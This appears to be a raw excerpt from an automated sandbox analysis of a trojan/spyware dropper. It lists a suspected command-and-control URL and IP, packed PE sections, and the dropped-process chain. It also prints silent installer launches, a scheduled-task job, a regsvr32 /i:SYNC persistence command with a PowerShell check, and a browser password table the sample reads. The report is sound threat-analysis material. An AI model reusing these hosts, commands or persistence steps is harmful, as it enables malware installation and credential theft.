Source: p199AjsEFs.exe, 00000000.00000003.2375047854.000000000092E000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2285626228.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://toppyneedus.biz/s2
Source: p199AjsEFs.exe, p199AjsEFs.exe, 00000000.00000003.2285626228.0000000000937000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2274707165.0000000000937000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://toppyneedus.biz:443/api
Source: p199AjsEFs.exe, 00000000.00000003.2243388806.00000000055FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: skotes.exe, 00000009.00000002.3415843852.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: 93f981a153.exe, 0000000C.00000003.3289364981.0000000002350000.00000004.00001000.00020000.00000000.sdmp, 93f981a153.exe, 0000000C.00000002.3413994744.0000000002121000.00000004.00001000.00020000.00000000.sdmp, 93f981a153.exe, 0000000C.00000003.3289474110.0000000002121000.00000004.00001000.00020000.00000000.sdmp, 93f981a153.tmp, 0000000D.00000002.3417237504.0000000002198000.00000004.00001000.00020000.00000000.sdmp, 93f981a153.tmp, 0000000D.00000003.3291571257.0000000002198000.00000004.00001000.00020000.00000000.sdmp, 93f981a153.tmp, 0000000D.00000003.3291485597.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, 93f981a153.tmp, 0000000D.00000002.3413165867.00000000005F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.easycutstudio.com/support.html
Source: p199AjsEFs.exe, 00000000.00000003.2183552215.000000000562C000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2183415030.000000000562F000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2183829099.000000000562C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: p199AjsEFs.exe, 00000000.00000003.2183552215.000000000562C000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2183415030.000000000562F000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2183829099.000000000562C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: p199AjsEFs.exe, 00000000.00000003.2242779092.0000000005633000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: p199AjsEFs.exe, 00000000.00000003.2242779092.0000000005633000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: p199AjsEFs.exe, 00000000.00000003.2242966046.0000000005705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: p199AjsEFs.exe, 00000000.00000003.2242966046.0000000005705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: p199AjsEFs.exe, 00000000.00000003.2242966046.0000000005705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: p199AjsEFs.exe, 00000000.00000003.2243388806.00000000055FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49796 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: dedicleb.exe.9.dr, EventManager.cs .Net Code: ManagerApp

System Summary

barindex
Source: p199AjsEFs.exe Static PE information: section name:
Source: p199AjsEFs.exe Static PE information: section name: .idata
Source: p199AjsEFs.exe Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: .idata
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: .idata
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: random[1].exe.9.dr Static PE information: section name:
Source: crossplatformplayer.exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CrossPlatformPlayer.exe.14.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00228860 9_2_00228860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00227049 9_2_00227049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_002278BB 9_2_002278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00222D10 9_2_00222D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_002231A8 9_2_002231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001E4DE0 9_2_001E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00217F36 9_2_00217F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001E4B30 9_2_001E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_0022779B 9_2_0022779B
Source: Joe Sandbox View Dropped File: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe A80F6C786A3E70DF146BCD6D9A3F59436D2E1121162B66D9DAEB9E30C5A9C3CC
Source: Joe Sandbox View Dropped File: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: random[1].exe1.9.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 264662bead.exe.9.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 93f981a153.tmp.12.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 93f981a153.tmp.12.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 93f981a153.tmp.12.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-GPTU0.tmp.13.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-GPTU0.tmp.13.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-GPTU0.tmp.13.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: 264662bead.tmp.15.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 264662bead.tmp.15.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 264662bead.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 264662bead.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-0867F.tmp.18.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-0867F.tmp.18.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-SE3IR.tmp.18.dr Static PE information: Number of sections : 23 > 10
Source: is-DFNTB.tmp.13.dr Static PE information: Number of sections : 19 > 10
Source: sqlite3.dll.14.dr Static PE information: Number of sections : 19 > 10
Source: p199AjsEFs.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: p199AjsEFs.exe Static PE information: Section: ZLIB complexity 0.9982501971608833
Source: p199AjsEFs.exe Static PE information: Section: cwtcsdxi ZLIB complexity 0.9945848139632107
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: Section: npkeuccx ZLIB complexity 0.9946879521398111
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: Section: npzhibgu ZLIB complexity 0.994113074018706
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: skotes.exe.4.dr Static PE information: Section: npzhibgu ZLIB complexity 0.994113074018706
Source: random[1].exe.9.dr Static PE information: Section: ZLIB complexity 1.0001273777173914
Source: random[1].exe.9.dr Static PE information: Section: qqtrmnsk ZLIB complexity 0.9945222034590261
Source: dedicleb.exe.9.dr, PrescriptionTracker.cs Security API names: File.GetAccessControl
Source: dedicleb.exe.9.dr, PrescriptionTracker.cs Security API names: File.SetAccessControl
Source: dedicleb.exe.9.dr, MoodBooster.cs Security API names: File.GetAccessControl
Source: dedicleb.exe.9.dr, MoodBooster.cs Security API names: File.SetAccessControl
Source: dedicleb.exe.9.dr, MoodBooster.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: dedicleb.exe.9.dr, FreelanceCalculator.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dedicleb.exe.9.dr, FreelanceCalculator.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@32/56@3/6
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XE5PZ0HA.htm Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\p199AjsEFs.exe File created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: p199AjsEFs.exe, 00000000.00000003.2184176730.00000000055FD000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2204742298.000000000561A000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2184014722.000000000561A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: p199AjsEFs.exe Virustotal: Detection: 72%
Source: p199AjsEFs.exe ReversingLabs: Detection: 79%
Source: HT94GNC6NP3AGR6EM8I9D3647.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\p199AjsEFs.exe File read: C:\Users\user\Desktop\p199AjsEFs.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\p199AjsEFs.exe "C:\Users\user\Desktop\p199AjsEFs.exe"
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe "C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe"
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process created: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe "C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe"
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe "C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe "C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe"
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Process created: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp "C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp" /SL5="$10023C,3422545,56832,C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe"
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe"
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process created: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp "C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp" /SL5="$403E8,1104885,161792,C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process created: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp "C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp" /SL5="$203F4,1104885,161792,C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe "C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe" Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process created: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe "C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe "C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe "C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Process created: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp "C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp" /SL5="$10023C,3422545,56832,C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process created: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp "C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp" /SL5="$403E8,1104885,161792,C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process created: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp "C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp" /SL5="$203F4,1104885,161792,C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: winmm.dll Jump to behavior
